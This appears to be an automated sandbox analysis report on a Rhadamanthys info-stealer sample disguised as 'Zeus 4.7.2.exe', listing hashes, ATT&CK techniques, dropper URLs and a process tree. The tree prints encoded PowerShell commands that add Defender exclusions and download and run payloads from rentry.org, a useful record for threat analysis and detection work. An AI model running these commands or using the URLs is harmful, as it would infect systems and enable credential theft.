rhadamanthys | 5a32b1864bcb2d237aca956c3b7474c2de484c38cbaa608ab5ffc71214bae2b8

Resubmissions

07/06/2024, 15:13

240607-slps8aac5v 10

07/06/2024, 15:11

240607-sk3zfsbb99 10

07/06/2024, 15:08

240607-sh7vmaac2s 10

07/06/2024, 15:05

240607-sgnqcsbb65 10

Analysis

max time kernel
150s
max time network
139s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
07/06/2024, 15:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Zeus 4.7.2.exe
Size

173KB
MD5

28e0ba051ad84949cfedd2a58b1636cb
SHA1

6ff46613adb7594c6abbe0ee9c64a68129501fb8
SHA256

265013eb61e407130b8fe723809549000ffe4ad96ef6c5ad1945e2727cee5aa0
SHA512

a14ea1a7e8756e15aee996c848006a1f2212acd753ca1629224b362fe8ef24331c49617f59bd84846b95a2143744418bbd78a4d0088efab76228344662ae67a4
SSDEEP

3072:NPBBih6XScZZmmiyQrcR6qx6LAIxkN3wlCxvxrtJRscwX7zhhxXNrykAOkvpObQ:Nyh6XffliyQrC6LAIxkpwlOJrtJRscwi

Score

10^/10

rhadamanthys evasion execution persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3320 created 3148	3320	abgzgntm.ivj1.exe	50

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	4116	powershell.exe
4	4116	powershell.exe
9	3760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4292	powershell.exe
4116	powershell.exe
1872	powershell.exe
3760	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
208	HadesHex-GUI.exe
4724	explorer.exe
5012	abgzgntm.ivj0.exe
3320	abgzgntm.ivj1.exe
4588	abgzgntm.ivj2.exe
3764	abgzgntm.ivj3.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	abgzgntm.ivj3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	bitbucket.org
9	bitbucket.org
3	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	api.ipify.org

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	abgzgntm.ivj2.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4588 set thread context of 4548	4588	abgzgntm.ivj2.exe	123

Launches sc.exe 7 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5000	sc.exe
1928	sc.exe
3452	sc.exe
3712	sc.exe
652	sc.exe
4396	sc.exe
2480	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3448	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4904	timeout.exe
880	timeout.exe
68	timeout.exe
824	timeout.exe
3864	timeout.exe
3320	timeout.exe
784	timeout.exe
68	timeout.exe
224	timeout.exe
2908	timeout.exe
2776	timeout.exe
4292	timeout.exe
2536	timeout.exe
1872	timeout.exe
2988	timeout.exe
792	timeout.exe
2632	timeout.exe
4664	timeout.exe
1640	timeout.exe
224	timeout.exe
3444	timeout.exe
2556	timeout.exe
2556	timeout.exe
5072	timeout.exe
1108	timeout.exe
1112	timeout.exe
4912	timeout.exe
1172	timeout.exe
4388	timeout.exe
828	timeout.exe
364	timeout.exe
64	timeout.exe
4604	timeout.exe
4920	timeout.exe
2708	timeout.exe
4600	timeout.exe
2592	timeout.exe
4584	timeout.exe
1008	timeout.exe
2840	timeout.exe
4612	timeout.exe
1616	timeout.exe
4932	timeout.exe
5076	timeout.exe
2148	timeout.exe
316	timeout.exe
2308	timeout.exe
1540	timeout.exe
4912	timeout.exe
4168	timeout.exe
2380	timeout.exe
4708	timeout.exe
1872	timeout.exe
1032	timeout.exe
4956	timeout.exe
4272	timeout.exe
2564	timeout.exe
1252	timeout.exe
4672	timeout.exe
4140	timeout.exe
4528	timeout.exe
196	timeout.exe
2920	timeout.exe
3088	timeout.exe

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery

T1057

pid	Process
4528	tasklist.exe
1928	tasklist.exe
2816	tasklist.exe
4952	tasklist.exe
5040	tasklist.exe
4476	tasklist.exe
4284	tasklist.exe
2988	tasklist.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
3888	taskkill.exe
4356	taskkill.exe
1064	taskkill.exe
4584	taskkill.exe
3004	taskkill.exe
4596	taskkill.exe
2288	taskkill.exe
4128	taskkill.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 07 Jun 2024 15:15:31 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717773330"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4116	powershell.exe
4116	powershell.exe
4116	powershell.exe
1872	powershell.exe
1872	powershell.exe
1872	powershell.exe
3760	powershell.exe
3760	powershell.exe
3760	powershell.exe
3320	abgzgntm.ivj1.exe
3320	abgzgntm.ivj1.exe
4260	dialer.exe
4260	dialer.exe
4260	dialer.exe
4260	dialer.exe
4588	abgzgntm.ivj2.exe
4292	powershell.exe
4292	powershell.exe
4292	powershell.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4588	abgzgntm.ivj2.exe
4548	dialer.exe
4548	dialer.exe
4588	abgzgntm.ivj2.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe
4548	dialer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeIncreaseQuotaPrivilege	4116	powershell.exe
Token: SeSecurityPrivilege	4116	powershell.exe
Token: SeTakeOwnershipPrivilege	4116	powershell.exe
Token: SeLoadDriverPrivilege	4116	powershell.exe
Token: SeSystemProfilePrivilege	4116	powershell.exe
Token: SeSystemtimePrivilege	4116	powershell.exe
Token: SeProfSingleProcessPrivilege	4116	powershell.exe
Token: SeIncBasePriorityPrivilege	4116	powershell.exe
Token: SeCreatePagefilePrivilege	4116	powershell.exe
Token: SeBackupPrivilege	4116	powershell.exe
Token: SeRestorePrivilege	4116	powershell.exe
Token: SeShutdownPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeSystemEnvironmentPrivilege	4116	powershell.exe
Token: SeRemoteShutdownPrivilege	4116	powershell.exe
Token: SeUndockPrivilege	4116	powershell.exe
Token: SeManageVolumePrivilege	4116	powershell.exe
Token: 33	4116	powershell.exe
Token: 34	4116	powershell.exe
Token: 35	4116	powershell.exe
Token: 36	4116	powershell.exe
Token: SeDebugPrivilege	3764	abgzgntm.ivj3.exe
Token: SeDebugPrivilege	3760	powershell.exe
Token: SeIncreaseQuotaPrivilege	4740	wmic.exe
Token: SeSecurityPrivilege	4740	wmic.exe
Token: SeTakeOwnershipPrivilege	4740	wmic.exe
Token: SeLoadDriverPrivilege	4740	wmic.exe
Token: SeSystemProfilePrivilege	4740	wmic.exe
Token: SeSystemtimePrivilege	4740	wmic.exe
Token: SeProfSingleProcessPrivilege	4740	wmic.exe
Token: SeIncBasePriorityPrivilege	4740	wmic.exe
Token: SeCreatePagefilePrivilege	4740	wmic.exe
Token: SeBackupPrivilege	4740	wmic.exe
Token: SeRestorePrivilege	4740	wmic.exe
Token: SeShutdownPrivilege	4740	wmic.exe
Token: SeDebugPrivilege	4740	wmic.exe
Token: SeSystemEnvironmentPrivilege	4740	wmic.exe
Token: SeRemoteShutdownPrivilege	4740	wmic.exe
Token: SeUndockPrivilege	4740	wmic.exe
Token: SeManageVolumePrivilege	4740	wmic.exe
Token: 33	4740	wmic.exe
Token: 34	4740	wmic.exe
Token: 35	4740	wmic.exe
Token: 36	4740	wmic.exe
Token: SeIncreaseQuotaPrivilege	4740	wmic.exe
Token: SeSecurityPrivilege	4740	wmic.exe
Token: SeTakeOwnershipPrivilege	4740	wmic.exe
Token: SeLoadDriverPrivilege	4740	wmic.exe
Token: SeSystemProfilePrivilege	4740	wmic.exe
Token: SeSystemtimePrivilege	4740	wmic.exe
Token: SeProfSingleProcessPrivilege	4740	wmic.exe
Token: SeIncBasePriorityPrivilege	4740	wmic.exe
Token: SeCreatePagefilePrivilege	4740	wmic.exe
Token: SeBackupPrivilege	4740	wmic.exe
Token: SeRestorePrivilege	4740	wmic.exe
Token: SeShutdownPrivilege	4740	wmic.exe
Token: SeDebugPrivilege	4740	wmic.exe
Token: SeSystemEnvironmentPrivilege	4740	wmic.exe
Token: SeRemoteShutdownPrivilege	4740	wmic.exe
Token: SeUndockPrivilege	4740	wmic.exe
Token: SeManageVolumePrivilege	4740	wmic.exe
Token: 33	4740	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4144 wrote to memory of 1872	4144	Zeus 4.7.2.exe	73
PID 4144 wrote to memory of 1872	4144	Zeus 4.7.2.exe	73
PID 4144 wrote to memory of 1872	4144	Zeus 4.7.2.exe	73
PID 4144 wrote to memory of 208	4144	Zeus 4.7.2.exe	75
PID 4144 wrote to memory of 208	4144	Zeus 4.7.2.exe	75
PID 4144 wrote to memory of 4724	4144	Zeus 4.7.2.exe	76
PID 4144 wrote to memory of 4724	4144	Zeus 4.7.2.exe	76
PID 4724 wrote to memory of 4116	4724	explorer.exe	77
PID 4724 wrote to memory of 4116	4724	explorer.exe	77
PID 4116 wrote to memory of 5012	4116	powershell.exe	80
PID 4116 wrote to memory of 5012	4116	powershell.exe	80
PID 4116 wrote to memory of 5012	4116	powershell.exe	80
PID 4116 wrote to memory of 3320	4116	powershell.exe	81
PID 4116 wrote to memory of 3320	4116	powershell.exe	81
PID 4116 wrote to memory of 3320	4116	powershell.exe	81
PID 5012 wrote to memory of 4712	5012	abgzgntm.ivj0.exe	83
PID 5012 wrote to memory of 4712	5012	abgzgntm.ivj0.exe	83
PID 4116 wrote to memory of 4588	4116	powershell.exe	82
PID 4116 wrote to memory of 4588	4116	powershell.exe	82
PID 4116 wrote to memory of 3764	4116	powershell.exe	86
PID 4116 wrote to memory of 3764	4116	powershell.exe	86
PID 4712 wrote to memory of 2596	4712	cmd.exe	88
PID 4712 wrote to memory of 2596	4712	cmd.exe	88
PID 3764 wrote to memory of 4220	3764	abgzgntm.ivj3.exe	89
PID 3764 wrote to memory of 4220	3764	abgzgntm.ivj3.exe	89
PID 4712 wrote to memory of 784	4712	cmd.exe	90
PID 4712 wrote to memory of 784	4712	cmd.exe	90
PID 4712 wrote to memory of 1816	4712	cmd.exe	129
PID 4712 wrote to memory of 1816	4712	cmd.exe	129
PID 4712 wrote to memory of 1336	4712	cmd.exe	92
PID 4712 wrote to memory of 1336	4712	cmd.exe	92
PID 3764 wrote to memory of 4968	3764	abgzgntm.ivj3.exe	93
PID 3764 wrote to memory of 4968	3764	abgzgntm.ivj3.exe	93
PID 4712 wrote to memory of 5000	4712	cmd.exe	130
PID 4712 wrote to memory of 5000	4712	cmd.exe	130
PID 4712 wrote to memory of 3448	4712	cmd.exe	95
PID 4712 wrote to memory of 3448	4712	cmd.exe	95
PID 4712 wrote to memory of 5008	4712	cmd.exe	96
PID 4712 wrote to memory of 5008	4712	cmd.exe	96
PID 5008 wrote to memory of 4600	5008	cmd.exe	97
PID 5008 wrote to memory of 4600	5008	cmd.exe	97
PID 4712 wrote to memory of 3568	4712	cmd.exe	98
PID 4712 wrote to memory of 3568	4712	cmd.exe	98
PID 3568 wrote to memory of 3640	3568	cmd.exe	99
PID 3568 wrote to memory of 3640	3568	cmd.exe	99
PID 4712 wrote to memory of 3760	4712	cmd.exe	100
PID 4712 wrote to memory of 3760	4712	cmd.exe	100
PID 3764 wrote to memory of 4740	3764	abgzgntm.ivj3.exe	101
PID 3764 wrote to memory of 4740	3764	abgzgntm.ivj3.exe	101
PID 3320 wrote to memory of 4260	3320	abgzgntm.ivj1.exe	103
PID 3320 wrote to memory of 4260	3320	abgzgntm.ivj1.exe	103
PID 3320 wrote to memory of 4260	3320	abgzgntm.ivj1.exe	103
PID 3320 wrote to memory of 4260	3320	abgzgntm.ivj1.exe	103
PID 3320 wrote to memory of 4260	3320	abgzgntm.ivj1.exe	103
PID 1796 wrote to memory of 1160	1796	cmd.exe	112
PID 1796 wrote to memory of 1160	1796	cmd.exe	112
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4588 wrote to memory of 4548	4588	abgzgntm.ivj2.exe	123
PID 4548 wrote to memory of 560	4548	dialer.exe	5

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4968	attrib.exe
4220	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:560
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:924

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:360

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:696

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:788

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1140
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3220

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1348

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1448
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\dialer.exe
    "C:\Windows\system32\dialer.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4260

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1568

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1684

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1768

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1784

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1932

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1876

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2072

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2456

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2528

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2856

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3260

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3408
- C:\Users\Admin\AppData\Local\Temp\Zeus 4.7.2.exe
  "C:\Users\Admin\AppData\Local\Temp\Zeus 4.7.2.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4144
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAbABlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZgBoACMAPgA="
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Users\Admin\HadesHex-GUI.exe
    "C:\Users\Admin\HadesHex-GUI.exe"
    3⤵
    - Executes dropped EXE
    PID:208
- - C:\Users\Admin\AppData\Roaming\explorer.exe
    "C:\Users\Admin\AppData\Roaming\explorer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4116
    - - C:\Users\Admin\AppData\Roaming\abgzgntm.ivj0.exe
        
        "C:\Users\Admin\AppData\Roaming\abgzgntm.ivj0.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5012
      - C:\Windows\System32\cmd.exe
        
